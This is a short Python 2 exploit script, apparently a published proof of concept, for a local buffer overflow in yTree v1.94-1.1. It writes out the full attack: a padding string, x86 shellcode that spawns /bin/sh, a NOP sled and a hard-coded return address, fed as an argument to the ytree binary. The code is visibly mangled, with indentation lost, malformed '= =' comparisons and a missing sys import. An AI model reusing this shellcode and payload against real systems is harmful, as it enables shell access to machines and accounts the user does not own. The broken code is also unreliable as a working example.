import os,subprocess
def run():
try :
print "# yTree Buffer Overflow by Juan Sacco"
print "# It's fuzzing time on unusable exploits"
print "# This exploit is for educational purposes only"
junk = "\x41" * 65
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
nops = "\x90" * 1200
eip = "\xd0\xf6\xff\xbf"
subprocess.call([ "ytree" , ' ' , junk + shellcode + nops + eip])
except OSError as e:
if e.errno = = os.errno.ENOENT:
print "Sorry, yTree not found!"
else :
print "Error executing exploit"
raise
def howtousage():
print "Snap! Something went wrong"
sys.exit( - 1 )
if __name__ = = '__main__' :
try :
print "Exploit yTree v1.94-1.1 Local Overflow Exploit"
print "Author: Juan Sacco"
except IndexError:
howtousage()
run()
|